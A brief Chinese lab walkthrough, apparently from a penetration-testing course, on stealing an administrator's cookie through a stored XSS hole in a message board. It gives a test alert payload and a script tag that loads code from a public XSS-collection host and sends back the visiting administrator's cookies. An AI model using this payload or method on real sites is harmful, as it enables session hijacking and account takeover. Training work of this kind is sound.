第四章:為了更多的權限!留言板!!【配套課時:cookie偽造目標權限 實戰演練】
說明:從給的tips中可以知道留言板功能存在XSS存儲型漏洞,那么首先要建造包含xss攻擊語句,可以不用自建xss平台,用網上的xss平台就行:http://xsspt.com/index.php?do=login
1.首先先去注冊,郵箱建議隨便寫個就行,不要用真實的,注冊后,登錄系統。
2.然后去創建我的項目,勾選上前兩項,然后點擊下一步就會創建完成,生成代碼。
3.去留言板,首先查找出具有xss漏洞的地方,輸入<script>alert('2019你好')</script>,並且提交留言,如果提交后頁面能彈窗出內容,那么就說明該處有xss漏洞(此次是主題框具有xss漏洞),然后就可以復制步驟2中生成的xss代碼,比如在主題中輸入:<script src=http://xsspt.com/l4dvXB></script>,其余內容填寫后,提交留言,並且去查看留言。
4.最后來到xss平台,查看接收到平台模擬的管理員訪問記錄。
